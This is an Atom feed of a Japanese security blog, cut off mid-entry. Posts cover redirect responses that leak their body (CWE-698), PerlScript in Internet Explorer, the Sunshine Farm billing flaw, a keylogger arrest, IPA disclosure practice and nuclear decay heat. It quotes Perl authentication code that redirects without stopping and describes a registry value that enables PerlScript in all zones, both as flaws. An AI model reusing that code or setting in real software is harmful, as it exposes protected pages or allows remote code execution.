<feed xmlns="http://www.w3.org/2005/Atom"><title>更新・追記されたえび日記</title><link href="http://bakera.jp/ebi" /><link href="http://bakera.jp/ebi/atom" rel="self" type="application/atom+xml" /><updated>2024-11-18T11:31:02+00:00</updated><author><name>水無月ばけら</name></author><id>tag:bakera.jp,2008:/ebi</id><entry><title>意図せぬレスポンスボディを含むリダイレクト応答</title><link href="http://bakera.jp/ebi/topic/3885" /><id>tag:bakera.jp,2008:/ebi/topic/3885</id><updated>2026-04-18T21:06:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/8/7">2009年8月7日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3885">意図せぬレスポンスボディを含むリダイレクト応答</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日21時6分頃</span></p><p>「<a href="http://d.hatena.ne.jp/unau/20070618/1186888444">ダチョウ式リダイレクトと名付けてみる修行</a> <em class="domain-info">(d.hatena.ne.jp)</em>」。</p><p>ここで言っている「ダチョウ式リダイレクト」とは、リダイレクト応答のレスポンスボディに意図せぬものが出力されている状態を指します。「頭隠して尻隠さず」という言葉がありますが、英語では <span lang="en" xml:lang="en">"To bury one's head ostrich-like in the sand."</span> と言うそうで、ostrich はダチョウですね。</p><p>ステータスコードが 301 や 302 などになっていて、Location: フィールドが出力されていれば、レスポンスボディが何であれリダイレクトは行われます。この場合、多くのブラウザではレスポンスボディは見えませんが、パケットを見ればレスポンスボディは丸見えという状態です。普通にブラウザで見ていても分からないので、テストでも発見しにくい厄介な不具合になります。</p><p>特に注意したいのは、ログインが必要なページで、未ログイン時にログインフォームへリダイレクトしているようなケース。このようなケースで「ダチョウ式」が発生すると、未ログイン時にはアクセスを拒否してリダイレクトしている……と思わせつつ、実はレスポンスボディにはログイン後画面の内容が出力されてしまっている、などという事が発生し得ます。ログインしていないのにログイン後画面の内容が取得できてしまうので、大変まずいことになります。</p><p>ところで、Perlのフレームワークとして有名なものにCatalystというものがあります。Catalystで認証機能を実装したいなぁ、などと考えて「Catalyst 認証」で検索すると、「<a href="http://www.tcool.org/catalyst/Cookbook.html">Catalyst::Manual::Cookbook - Catalystクックブック</a> <em class="domain-info">(www.tcool.org)</em>」がヒットします。これは、少し古い Catalyst-5.62 の Catalyst::Manual::Cookbook の和訳です。</p><p>このドキュメントには「ユーザにかならずログインしてもらう」という項目があって、以下のようなサンプルコードが掲げられています。</p><div class="sample"><pre>
  sub auto : Private {
    my ($self, $c) = @_;
    my $login_path = 'user/login';

    # 実際にログインページにたどり着けるようにします!
    if ($c-&gt;req-&gt;path eq $login_path) {
      return 1;
    }

    # ユーザが登録されていればOKです
    if ( $c-&gt;req-&gt;user ) {
      $c-&gt;session-&gt;{'authed_user'} =
        MyApp::M::MyDB::Customer-&gt;retrieve(
          'username' =&gt; $c-&gt;req-&gt;user
        );
    }

    # そうでなければログインしていないということ
    else {
      # force the login screen to be shown
      $c-&gt;res-&gt;redirect($c-&gt;req-&gt;base . $login_path);
    }

    # 処理を続行します
    return 1;
  }
</pre></div><p>このコードには大いなる罠が潜んでいるわけです。ログインしていないとき、$c-&gt;res-&gt;redirect($c-&gt;req-&gt;base . $login_path); でリダイレクトしていますが、その後に return 0; していないので、autoの前処理が終わった後に普通の処理が実行されます。つまり、リダイレクト応答しつつも、ログインしているときと同様のレスポンスボディが出力されてしまう可能性があります。</p><p class="note">※もっとも、ログインしていることを前提とした処理になっている場合、ログインセッションがないために例外になってセーフ、ということもあります。その辺りは運です。:-)</p><p>単に return 0; が抜けただけのケアレスミスだと思うのですが、そのまま使うと大変です。ちなみに、最新の<a href="http://search.cpan.org/dist/Catalyst-Manual/lib/Catalyst/Manual/Cookbook.pod">Catalyst::Manual::Cookbook </a> <em class="domain-info">(search.cpan.org)</em>では、このコードはなくなっているようです。</p><p class="note">※そういえばhatomaru.dllもリダイレクト応答はだいぶ手抜きですね。まあ、リダイレクト以外も全体的に手抜きですが。</p><p class="note">※追記: CWE では "Redirect Without Exit" と呼ばれている模様: <a href="http://cwe.mitre.org/data/definitions/698.html">CWE-698: Redirect Without Exit</a> <em class="domain-info">(cwe.mitre.org)</em></p><ul class="comment-link"><li><a href="../topic/3885/comment">「意図せぬレスポンスボディを含むリダイレクト応答」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Web">Web</a></span></p></div></div></content></entry><entry><title>text/perlscript</title><link href="http://bakera.jp/ebi/topic/3609" /><id>tag:bakera.jp,2008:/ebi/topic/3609</id><updated>2026-04-18T20:45:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/5/25">2009年5月25日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3609">text/perlscript</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日20時45分頃</span></p><p>「<a href="http://slashdot.jp/it/09/05/23/1421222.shtml">人気が出れば出るほど、Webブラウザは遅くなる</a> <em class="domain-info">(slashdot.jp)</em>」という話が出ていますが、中に興味深いコメントが。</p><div class="quote-and-cite"><blockquote cite="http://slashdot.jp/it/comments.pl?sid=451376&amp;cid=1571864"><p>ActivePerlを使っている人は知ってると思うけど、ActivePerlをインストールするとPerlScript [activestate.com]も書けますよ。</p></blockquote><p class="cite">以上、<a href="http://slashdot.jp/it/comments.pl?sid=451376&amp;cid=1571864">Re:JavaScriptの部分だけ別にできないの？</a> より</p></div><p>これは知りませんでした。確かに、以下のようなものをローカルで表示してみると動作しますね。</p><div class="sample"><p>&lt;script type="text/perlscript"&gt;$window-&gt;alert('PerlScript');&lt;/script&gt;</p></div><p>これは新しい<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>のパターンが出るか!? と思いきや、http://bakera.jp/bug/perlscripttest.html に置いてみても動作せず。中身を保存してローカルで開くと動作するので、どうもローカルでしか動作しないように思います。そういうものなのですかね?</p><p>……と書いていたら、ZnZさんからコメントをいただきました(ありがとうございます)。レジストリの HKEY_LOCAL_MACHINE\SOFTWARE\ActiveState\PerlScript\1.0 に値を設定することで、どのゾーンで動作するか指定できるようです。デフォルトでは 0x0010 になっていてローカルでしか動作しませんが、この値をたとえば 0x0001 にすると、あらゆるゾーンで動作するようになります。</p><p>この値については<a href="http://docs.activestate.com/activeperl/5.10/Components/Windows/PerlScript.html#perlscript_configuration">How can I configure client-side PerlScript security?</a> <em class="domain-info">(docs.activestate.com)</em> に書かれていて、そこにはこのような記述もあります。</p><div class="quote-and-cite"><blockquote><p>Note: By default, PerlScript is only enabled in IE's Local zone. Enabling PerlScript any other zones is not recommended. It allows websites to execute Perl code on the local machine as the current user.</p></blockquote></div><p>というわけで、デフォルト以外の設定にすることは推奨されないようです。</p><ul class="comment-link"><li><a href="../topic/3609/comment">「text/perlscript」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Perl">Perl</a></span></p></div></div></content></entry><entry><title>サンシャイン牧場・課金システム修正のアナウンス</title><link href="http://bakera.jp/ebi/topic/3948" /><id>tag:bakera.jp,2008:/ebi/topic/3948</id><updated>2026-04-18T19:30:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/10/24">2009年10月24日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/3948">サンシャイン牧場・課金システム修正のアナウンス</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日19時30分頃</span></p><p><a href="../topic/3945">サンシャイン牧場の件</a>、ユーザー向けにこんなアナウンスが出ていますね。mixi会員でないと読めませんが。</p><div class="quote-and-cite"><blockquote cite="http://mixi.jp/view_bbs.pl?id=47439519&amp;comm_id=4523467"><p>Kコインの利用において、一部不具合がありユーザーの皆様には大変ご迷惑をおかけしました。</p><p>現在、不具合は修正され正常にご利用頂けます。</p><p>万一、Kコインの購入について不具合がある方は「提供者に問い合わせる」よりご連絡をお願いいたします。</p></blockquote><p class="cite">以上、<a href="http://mixi.jp/view_bbs.pl?id=47439519&amp;comm_id=4523467">[mixi] 「サンシャイン牧場」Rekoo | Kコインでの一部不具合について</a> より</p></div><p>これで全文です。ひとまず、「修正しました」という旨のみの報告のようですね。これで終わりということはないと思いますが、どうでしょう。ともあれ様子見で。</p><p>……と、様子を見ていたら、夕方になって情報が追加されたようです。</p><div class="quote-and-cite"><blockquote cite="http://mixi.jp/view_bbs.pl?id=47439519&amp;comm_id=4523467"><p>Ｋコインの利用において、一部不具合があり、</p><p>ユーザーの皆様には大変ご迷惑をおかけしました。</p><p>現在、不具合は修正され正常にご利用頂けます。</p><p>不具合の内容は以下の通りです。</p><p>（不具合内容）</p><p>・Kコインを正常に購入したにも関わらず、Kコインが付与されていないケースがありました。</p><p>・Kコインの購入システムにおいて、一部脆弱性が懸念される箇所がありました。</p><p>これらは現在修正されております。</p><p>また、Kコインが付与されないケースについては確認が取れ次第付与をいたしております。</p><p>万一、Kコインの購入について不具合がある方は、</p><p>「提供者に問い合わせる」よりご連絡をお願いいたします。</p></blockquote><p class="cite">以上、<a href="http://mixi.jp/view_bbs.pl?id=47439519&amp;comm_id=4523467">[mixi] 「サンシャイン牧場」Rekoo | Kコインでの一部不具合について</a> より</p></div><p>「一部脆弱性が懸念される箇所がありました」だそうです。脆弱性の内容についての詳細は、まだアナウンスされていないようですね。</p><p class="note">※コメント欄のノイズが酷すぎて、「脆弱性ってなんですか」とか書ける雰囲気ではないような……。</p><p class="note">※2009-10-31追記: さらに追加のアナウンスがありました: 「<a href="../topic/3954">サンシャイン牧場・課金システムの問題についてのアナウンス</a>」</p><ul class="comment-link"><li><a href="../topic/3948/comment">「サンシャイン牧場・課金システム修正のアナウンス」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%82%B5%E3%83%B3%E3%82%B7%E3%83%A3%E3%82%A4%E3%83%B3%E7%89%A7%E5%A0%B4">サンシャイン牧場</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>ウェブの仕事力が上がる標準ガイドブック5 Webプログラミング</title><link href="http://bakera.jp/ebi/topic/3355" /><id>tag:bakera.jp,2008:/ebi/topic/3355</id><updated>2026-04-18T18:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/5">2008年11月5日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/3355">ウェブの仕事力が上がる標準ガイドブック5 Webプログラミング</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日18時0分頃</span></p><p>まだ手元には届いていませんが、発売されているっぽいです。</p><ul><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/486267030X&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ウェブの仕事力が上がる標準ガイドブック5 Webプログラミング</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=486267030X" alt="" width="1" height="1" /></span></li></ul><p>我が社が誇るシニア・ソフトウェアエンジニア、<a href="../topic/3313">Riyuuzi Sakai氏(誰?)</a>がリアル書籍に初の執筆! 歴史上の重要なマイルストーンとなる一冊だッ!!</p><p>……って<a href="../topic/3336">以前</a>も書きましたけれども。</p><p>私は7章のセキュリティのところに少しだけ書いています。もっとも、私の担当分は冒頭の導入部っぽいところだけで、後半の具体的な解説は私の執筆ではありません。</p><p class="note">※まあ、分かっている人が読めば分かると思いますが。</p><p>基本的にはマニア向けではなく、「これからWebアプリケーションの仕事に携わりたい」と考えている方が基礎的な知識を広く浅く身につけるための本かと思います。本業のプログラマの方が読むと内容はぬるいと感じるでしょうが、まあそういうものだということで……。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3355/comment">「ウェブの仕事力が上がる標準ガイドブック5 Webプログラミング」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9F%E3%83%B3%E3%82%B0">プログラミング</a> / <a href="../genre/%E6%9C%AC">本</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>冷温停止は停止直後が勝負</title><link href="http://bakera.jp/ebi/topic/4492" /><id>tag:bakera.jp,2008:/ebi/topic/4492</id><updated>2026-04-18T17:35:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/8/4">2011年8月4日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/4492">冷温停止は停止直後が勝負</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日17時35分頃</span></p><p>こんな記事が……「<a href="http://www.nikkeibp.co.jp/article/sj/20110801/279552/">国民生活の悪化をもたらす電力使用制限。諸悪の根源は政府の原発政策が定まらぬことにあり。一刻も早く方向性を決めよ！</a> <em class="domain-info">(www.nikkeibp.co.jp)</em>」。内容はまあ気にしないとして、気になったのは最後のこの部分です。</p><div class="quote-and-cite"><blockquote cite="http://www.nikkeibp.co.jp/article/sj/20110801/279552/?P=8"><p>政府は、安全が確認されるまで浜岡原発を停止させるなど、原発停止をリスク軽減策として考えているようだが、それは大きな誤りだ。燃料の入った原子炉は、稼動していても、停止していても、ほとんどリスクは変わらない。冷温停止していた福島第一原発の4号機が、電源供給を失って水素爆発したのが、よい例だ。</p></blockquote><p class="cite">以上、<a href="http://www.nikkeibp.co.jp/article/sj/20110801/279552/?P=8">国民生活の悪化をもたらす電力使用制限。諸悪の根源は政府の原発政策が定まらぬことにあり。一刻も早く方向性を決めよ！</a> より</p></div><p>これは意味が分かりませんでした。</p><p>そもそも、「よい例」といっている4号機についての認識が間違っています。4号機は2010年11月30日から定期検査に入っていて、炉心から核燃料が抜かれていました。「<a href="http://www.tepco.co.jp/cc/press/10112901-j.html">福島第一原子力発電所４号機の定期検査開始について</a> <em class="domain-info">(www.tepco.co.jp)</em>」を見るとシュラウド (圧力容器の中で燃料集合体を支える部品) の交換などもしているわけで、燃料が入ったままで作業するのは不可能です。4号機の原子炉は空っぽで、核燃料は使用済み核燃料プールに移されていました。</p><p>それがどうして爆発したのかというと、実は良く分かっていません。湯気のようなものが観測されていたこともあり、当初は、プールの中の核燃料が高温になって水素が発生し、水素爆発を起こした……という説が有力でした。しかしその後の調査では、燃料棒が破損している形跡は認められませんでした (参考: 「<a href="http://www.yomiuri.co.jp/science/news/20110509-OYT1T01116.htm">４号機の激しい損壊、水素爆発以外の原因か</a> <em class="domain-info">(www.yomiuri.co.jp)</em>」)。</p><p class="note">※3号機と4号機はつながっているため、3号機で発生した水素が流れ込んだのではないか、という見方もあります。</p><p>原子炉から出して数ヶ月経った使用済み燃料は、崩壊熱を出し続けてはいるものの、すぐに溶融が起きるほどの熱量ではないということがわかります。</p><p>原子炉の中では放射性元素がどんどん生成されていますが、その中には半減期がきわめて短いものもあります。核分裂連鎖反応が止まった直後は膨大な熱を出しますが、熱量は急速に減っていきます。「<a href="http://d.hatena.ne.jp/arc_at_dmz/20110319/nc_plant_decay_heat">MIT原子力理工学部による「崩壊熱」についての解説</a> <em class="domain-info">(d.hatena.ne.jp)</em>」のページに出ているグラフを見ると、停止直後に一気に下がり、その後は減り方が緩やかになることがわかるでしょう。なんとか1日耐えれば、熱量は2%以下になります。</p><p class="note">※「<a href="http://www.rri.kyoto-u.ac.jp/NSRG/kid/safety/decayhea.htm">崩壊熱発生率</a> <em class="domain-info">(www.rri.kyoto-u.ac.jp)</em>」などは対数グラフなので注意。</p><p>停止直後の膨大な熱を何とかできれば、あとは比較的安定します。その安定性の目安のひとつとされているのが100度という温度で、100度以下で安定した状態のことを「冷温停止」と呼んでいます。冷温停止状態になっても冷やし続ける必要はあるのですが、停止直後とは熱の量が全く違いますから、ここで冷却が止まっても時間の猶予があります。</p><p>つまり、停止直後が勝負だということです。冷却装置がきちんと稼働する状態で停止すれば、停止直後の膨大な熱もすみやかに冷却できますから、スムーズに冷温停止状態に移行することができます。実際、浜岡原発は停止してから1日と少しで冷温停止状態になっています (参考: <a href="http://www.yomiuri.co.jp/atmoney/news/20110515-OYT1T00309.htm">浜岡５号機、冷温停止に…冷却水に海水混入も</a> <em class="domain-info">(www.yomiuri.co.jp)</em>)。この状態でもまだ冷やし続ける必要はありますが、崩壊熱は2%以下になっていますから、リスクは全く違います。</p><p>対する福島第一原発1～3号機では、運転中に地震が起きてしまいましたから、十分な冷却が行われる前に冷却が止まり、核燃料は融けてしまいました。そして、少なくともその一部は圧力容器や格納容器の外に出てしまっていると考えられています。一度こうなってしまうと、冷却すること自体が困難になります。事故が起きてから慌てて冷やそうと思っても、手遅れになる場合があるということです。</p><p>まとめると、</p><ul><li>運転中でも冷温停止状態でも冷却が必要、というのは正しい</li><li>運転中と冷温停止状態とでは崩壊熱の量が全く異なる。いったん冷温停止になれば、事故で冷却が停止しても、溶融までは時間の猶予がある</li><li>平常時なら問題なく冷却できるが、運転中に問題が起きると冷却自体に支障を来す可能性がある</li></ul><p>ということです。最初の点だけを見ると「稼動していても、停止していても、ほとんどリスクは変わらない」と思えてしまうかもしれませんが、その考えは誤りです。リスクは全く違うと言って良いと思います。</p><p class="note">※「止めても高レベル放射性廃棄物が残る問題は解決しない」という見方もあり、それはそれで正しいと思いますが、事故時のリスクとはまた別の話です。</p><ul class="comment-link"><li><a href="../topic/4492/comment">「冷温停止は停止直後が勝負」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E5%8E%9F%E5%AD%90%E5%8A%9B">原子力</a> / <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a> / <a href="../genre/%E7%B5%8C%E5%96%B6">経営</a></span></p></div></div></content></entry><entry><title>パスワード盗み返し</title><link href="http://bakera.jp/ebi/topic/3512" /><id>tag:bakera.jp,2008:/ebi/topic/3512</id><updated>2026-04-18T16:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/2/6">2009年2月6日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3512">パスワード盗み返し</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日16時20分頃</span></p><p><a href="http://www.asahi.com/national/update/0205/NGY200902050001.html">「ハッカー」に逆襲、パスワード盗み返す　中３書類送検</a> <em class="domain-info">(www.asahi.com)</em></p><div class="quote-and-cite"><blockquote><p>インターネットのＩＤとパスワードを盗もうとした「ハッカー」から逆にパスワードなどを盗み返したとして、愛知県警は５日、兵庫県尼崎市の中学３年の少年（１５）を不正アクセス禁止法違反の疑いで書類送検した。調べに対して、少年は「メールを盗み見たりして、困らせてやろうと思った」と話しているという。</p></blockquote></div><p>パスワードを盗んだとしても、それだけでは不正アクセス禁止法の言う不正アクセス行為にはならないはずです。三条で定義されている不正アクセス行為は、以下の三つだけです。</p><div class="quote-and-cite"><blockquote cite="http://law.e-gov.go.jp/htmldata/H11/H11HO128.html#1000000000000000000000000000000000000000000000000200000000000000000000000000000"><p>２ 　前項に規定する不正アクセス行為とは、次の各号の一に該当する行為をいう。</p><p>一 　アクセス制御機能を有する特定電子計算機に電気通信回線を通じて当該アクセス制御機能に係る他人の識別符号を入力して当該特定電子計算機を作動させ、当該アクセス制御機能により制限されている特定利用をし得る状態にさせる行為（当該アクセス制御機能を付加したアクセス管理者がするもの及び当該アクセス管理者又は当該識別符号に係る利用権者の承諾を得てするものを除く。）</p><p>二 　アクセス制御機能を有する特定電子計算機に電気通信回線を通じて当該アクセス制御機能による特定利用の制限を免れることができる情報（識別符号であるものを除く。）又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為（当該アクセス制御機能を付加したアクセス管理者がするもの及び当該アクセス管理者の承諾を得てするものを除く。次号において同じ。）</p><p>三 　電気通信回線を介して接続された他の特定電子計算機が有するアクセス制御機能によりその特定利用を制限されている特定電子計算機に電気通信回線を通じてその制限を免れることができる情報又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為</p></blockquote><p class="cite">以上、<a href="http://law.e-gov.go.jp/htmldata/H11/H11HO128.html#1000000000000000000000000000000000000000000000000200000000000000000000000000000">不正アクセス行為の禁止等に関する法律 第三条</a> より</p></div><p>そんなわけで、検挙の理由は「パスワードを盗んだから」ではなくて、「盗んだパスワードを入力してアクセスしたから」でなければならないはずです。</p><p>ところで、技術的に興味深いのはこれですね。</p><div class="quote-and-cite"><blockquote><p>操作の履歴の送付先になっていた男性のメールアドレスやＩＤ、パスワードを割り出したという。</p></blockquote></div><p>キーロガーを分析して分かったというこれ、何のパスワードなんですかね。キーロガーのデータ送信用にパスワードが必要なのかという疑問が沸くわけですが。どこかのメールサーバを経由してメールを送るようになっていて、SMTP認証が必要だったとか? なんか、キーロガーが脆弱なのではないかという気がしてきますが。</p><ul class="comment-link"><li><a href="../topic/3512/comment">「パスワード盗み返し」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>サンシャイン牧場の件が全国ニュースに</title><link href="http://bakera.jp/ebi/topic/3956" /><id>tag:bakera.jp,2008:/ebi/topic/3956</id><updated>2026-04-18T15:30:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/11/3">2009年11月3日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3956">サンシャイン牧場の件が全国ニュースに</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日15時30分頃</span></p><p><a href="../topic/3945">サンシャイン牧場の件</a>ですが、読売新聞に出たようですね: <a href="http://www.yomiuri.co.jp/national/news/20091103-OYT1T00155.htm">ミクシィ、４２００人の情報が３日間「露出」</a> <em class="domain-info">(www.yomiuri.co.jp)</em>。</p><div class="quote-and-cite"><blockquote><p>リクー社が調べたところ、判明しただけで８０人分の購入した計３８万円分のアイテムの記録が消滅していたことが判明。さらに、クレジットカードでゲーム内通貨を購入しようとした利用者４２００人分の電話番号やメールアドレスが外部から閲覧できる状態になっていたことが分かった。</p></blockquote></div><p>最大約4200人というのは、修正前にクレジットカードを利用した人の総数でしょうね。</p><p>80人で38万円購入というと平均5000円近いわけで、ずいぶん単価が高いように見えますが、その80人はおそらく、「前回のクレジットカードを使う」を選択して2回目の課金を行った人たちでしょう。もともと購入意欲の高い層だった上に、「Kコインが増えないので課金操作を繰り返した」という方もいらっしゃるようなので、単価が高く出ているのだろうと思います。</p><div class="quote-and-cite"><blockquote><p>ミクシィは「現時点で個人情報を悪用されたという報告はなく、一般のユーザーが偶然に見た可能性はほぼないと考えられる」としているが、「今後、課金システムを導入する際には弊社として審査するなど、運用を見直したい」としている。</p></blockquote></div><p>「一般のユーザーが偶然に見た可能性はほぼない」というのは、単に「現時点で悪用の報告がない」からそう判断しているのか、それともログを確認した上で言っているのか、どちらなのでしょうね。前者っぽい気もしますが。</p><p>いずれにしても、停止の判断や修正作業が素早かったために被害の拡大を防ぐことができた、と考えて良いのでしょうか。カカクコム事件では停止の判断の遅れが問題になりましたが、今回はそこはきちんと対応されたのではないかと思います。</p><p>ただ、対応後の告知は分かりにくかったようで。<a href="../topic/3954">30日の夜に出た公式コミュニティのアナウンス</a>には、10月31日までに49のコメントがついて止まっていましたが、今日になってコメントが100を超えています。mixiの「重要なお知らせ」にも出ていたのに、「コミュニティ内部でしか報告されていないのはおかしい」という旨のコメントが複数ついていますし、告知に気付いていない方も多かったようですね。</p><p class="note">※追記: テレビのニュースでもやっていたようで : <a href="http://www.fnn-news.com/news/headlines/articles/CONN00165916.html">FNNニュース: 「mixi」上のゲームで利用者約4,200人分の個人情報が3日間にわたり閲覧可能な状態に</a> <em class="domain-info">(www.fnn-news.com)</em></p><ul class="comment-link"><li><a href="../topic/3956/comment">「サンシャイン牧場の件が全国ニュースに」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%82%B5%E3%83%B3%E3%82%B7%E3%83%A3%E3%82%A4%E3%83%B3%E7%89%A7%E5%A0%B4">サンシャイン牧場</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>情報セキュリティ早期警戒パートナーシップにおいて修正がなされない場合の運用</title><link href="http://bakera.jp/ebi/topic/3491" /><id>tag:bakera.jp,2008:/ebi/topic/3491</id><updated>2026-04-18T15:10:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/1/15">2009年1月15日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/3491">情報セキュリティ早期警戒パートナーシップにおいて修正がなされない場合の運用</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日15時10分頃</span></p><p>「<a href="http://d.hatena.ne.jp/atsushieno/20090114">続: Winny研究者がなぜウィルスによる情報漏洩の責任を問われうるか</a> <em class="domain-info">(d.hatena.ne.jp)</em>」という話があるようですが、情報セキュリティ早期警戒パートナーシップに関する部分について少しメモしておきます。</p><div class="quote-and-cite"><blockquote><p>通常であれば、IPAがガイドラインにて提示し報告を受け付ける脆弱性情報は、アプリケーション等の作者等に連絡され、相応の対応期間を経て対応が為されない場合は公開される。</p></blockquote></div><p>「情報セキュリティ早期警戒パートナーシップガイドライン」では、取扱開始から45日後を公表の目安としています。では、45日を過ぎても修正されなかったらどうなるのでしょうか。普通に考えると「当然公開されるよね?」と思えるのですが、実はガイドラインにはその点は明記されていないのですね。</p><p>では、実際の運用ではどうなっているのかというと、期間が過ぎたので公開されたという例は見たことがありません。つまり、IPAから脆弱性を通知された人は、みんなちゃんと期間内に直してくれているわけです。</p><p>……なんてこと、あるわけないですね。</p><p>たとえば、私が2006年11月24日に届出を行った案件。このソフトウェアは2009年1月15日現在でも公開されていますが、最新版でも修正されていません。その脆弱性の情報はいまだに公開されていないのです。Webアプリケーションの場合は<a href="../topic/3203">諦めて取扱終了</a>というパターンがあるのですが、ソフトウェア製品で諦めたパターンは見たことがないですね。</p><p>もっとも、最初から対処不能な場合はまた別で……。</p><div class="quote-and-cite"><blockquote><p>しかし、作者等が対応不能であることが明白である場合（これには、Winnyのように作者が訴追を受けている場合のみならず、作者が死亡している場合や逮捕勾留されている場合を含む）については、ガイドラインは想定していない。対策が施されないことが明白であり、かつ、この脆弱性の放置そのものによって被害が生じるわけではなく、むしろ公開によって情報流出の危険性が生じると考えられる以上、情報を公開することでかえってウィルス作成に積極的に貢献している（情報を公開しなければウィルス作成は為されなかった）と認められる状況もありうるというのが、わたしの指摘である。</p></blockquote></div><p>「<a href="http://jvn.jp/jp/JVN74294680/index.html">JVN#74294680 Winny におけるバッファオーバーフローの脆弱性</a> <em 